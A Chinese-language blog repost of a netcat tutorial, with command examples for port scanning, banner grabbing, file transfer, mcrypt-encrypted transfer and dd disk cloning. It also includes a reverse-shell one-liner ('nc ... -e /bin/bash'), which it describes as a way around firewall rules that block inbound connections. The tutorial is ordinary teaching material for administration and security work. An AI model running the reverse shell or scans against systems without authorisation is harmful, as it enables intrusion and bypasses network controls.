zoukankan      html  css  js  c++  java
  • Linux Netcat 命令—网络工具中的瑞士军刀

    Linux Netcat 命令—网络工具中的瑞士军刀

    作者:http://www.linuxeden.com/html/news/20130411/138061.html
    出处:http://www.linuxeden.com/html/news/20130411/138061.html


    Linux netcat 命令实例:

    1,端口扫描

    端口扫描经常被系统管理员和黑客用来发现在一些机器上开放端口,帮助他们识别系统中的漏洞。

    $nc -z -v -n 172.31.100.7 21-25
    可以运行在TCP或者UDP模式,默认是TCP,-u参数调整为udp.

    z 参数告诉netcat使用0 IO,指的是一旦连接关闭,不进行数据交换(译者注:这里翻译不准,如有其它更好的,请指出)

    v 参数指使用冗余选项(译者注:即详细输出)

    n 参数告诉netcat 不要使用DNS反向查询IP地址的域名

    这个命令会打印21到25 所有开放的端口。Banner是一个文本,Banner是一个你连接的服务发送给你的文本信息。当你试图鉴别漏洞或者服务的类型和版本的时候,Banner信息是非常有用的。但是,并不是所有的服务都会发送banner。

    一旦你发现开放的端口,你可以容易的使用netcat 连接服务抓取他们的banner。

    $ nc -v 172.31.100.7 21
    netcat 命令会连接开放端口21并且打印运行在这个端口上服务的banner信息。

    3,文件传输

    大部分时间中,我们都在试图通过网络或者其他工具传输文件。有很多种方法,比如FTP,SCP,SMB等等,但是当你只是需要临时或者一次传输文件,真的值得浪费时间来安装配置一个软件到你的机器上嘛。假设,你想要传一个文件file.txt 从A 到B。A或者B都可以作为服务器或者客户端,以下,让A作为服务器,B为客户端。

    Server

    $nc -l 1567 < file.txt
    Client
    $nc -n 172.31.100.7 1567 > file.txt
    这里我们创建了一个服务器在A上并且重定向netcat的输入为文件file.txt,那么当任何成功连接到该端口,netcat会发送file的文件内容。

    在客户端我们重定向输出到file.txt,当B连接到A,A发送文件内容,B保存文件内容到file.txt.

    没有必要创建文件源作为Server,我们也可以相反的方法使用。像下面的我们发送文件从B到A,但是服务器创建在A上,这次我们仅需要重定向netcat的输出并且重定向B的输入文件。

    B作为Server

    Server

    $nc -l 1567 > file.txt

    Client

    nc 172.31.100.23 1567 < file.txt

    5. 加密你通过网络发送的数据

    如果你担心你在网络上发送数据的安全,你可以在发送你的数据之前用如mcrypt的工具加密。

    服务端

    $nc localhost 1567 | mcrypt –flush –bare -F -q -d -m ecb > file.txt
    使用mcrypt工具加密数据。

    客户端

    $mcrypt –flush –bare -F -q -m ecb < file.txt | nc -l 1567
    使用mcrypt工具解密数据。

    以上两个命令会提示需要密码,确保两端使用相同的密码。

    这里我们是使用mcrypt用来加密,使用其它任意加密工具都可以。

    7,克隆一个设备

    如果你已经安装配置一台Linux机器并且需要重复同样的操作对其他的机器,而你不想在重复配置一遍。不在需要重复配置安装的过程,只启动另一台机器的一些引导可以随身碟和克隆你的机器。

    克隆Linux PC很简单,假如你的系统在磁盘/dev/sda上

    Server

    $dd if=/dev/sda | nc -l 1567
    Client
    $nc -n 172.31.100.7 1567 | dd of=/dev/sda
    dd是一个从磁盘读取原始数据的工具,我通过netcat服务器重定向它的输出流到其他机器并且写入到磁盘中,它会随着分区表拷贝所有的信息。但是如果我们已经做过分区并且只需要克隆root分区,我们可以根据我们系统root分区的位置,更改sda 为sda1,sda2.等等。

    反向shell

    反向shell是人曾经在客户端打开的shell。反向shell这样命名是因为不同于其他配置,这里服务器使用的是由客户提供的服务。

    服务端

    $nc -l 1567
    在客户端,简单地告诉netcat在连接完成后,执行shell。

    客户端

    $nc 172.31.100.7 1567 -e /bin/bash
    现在,什么是反向shell的特别之处呢 
    反向shell经常被用来绕过防火墙的限制,如阻止入站连接。例如,我有一个专用IP地址为172.31.100.7,我使用代理服务器连接到外部网络。如果我想从网络外部访问 这台机器如1.2.3.4的shell,那么我会用反向外壳用于这一目的。 
     

    11. 指定源地址

    假设你的机器有多个地址,希望明确指定使用哪个地址用于外部数据通讯。我们可以在netcat中使用-s选项指定ip地址。

    服务器端

    $nc -u -l 1567 < file.txt

    客户端

    $nc -u 172.31.100.7 1567 -s 172.31.100.5 > file.txt

    该命令将绑定地址172.31.100.5。

    这仅仅是使用netcat的一些示例。

    其它用途有:

    • 使用-t选项模拟Telnet客户端,
    • HTTP客户端用于下载文件,
    • 连接到邮件服务器,使用SMTP协议检查邮件,
    • 使用ffmpeg截取屏幕并通过流式传输分享,等等。其它更多用途。

    简单来说,只要你了解协议就可以使用netcat作为网络通讯媒介,实现各种客户端。

    参考文档

    Netcat手册

  • 相关阅读:
    小学四则运算APP 最后阶段
    小学四则运算APP 第三阶段冲刺-第一天
    小学四则运算APP 第二阶段冲刺-第五天
    小学四则运算APP 第二次冲刺 第四天
    小学四则运算APP 第二阶段冲刺-第三天
    小学四则运算APP 第二次冲刺-第二天
    小学四则运算APP 第二个冲刺 第一天
    小学四则运算APP 第一个冲刺 第八天
    小学四则运算APP 第一个冲刺 第七天
    小学四则运算APP 第一个冲刺阶段 第六天
  • 原文地址:https://www.cnblogs.com/leonxyzh/p/7289119.html
Copyright © 2011-2022 走看看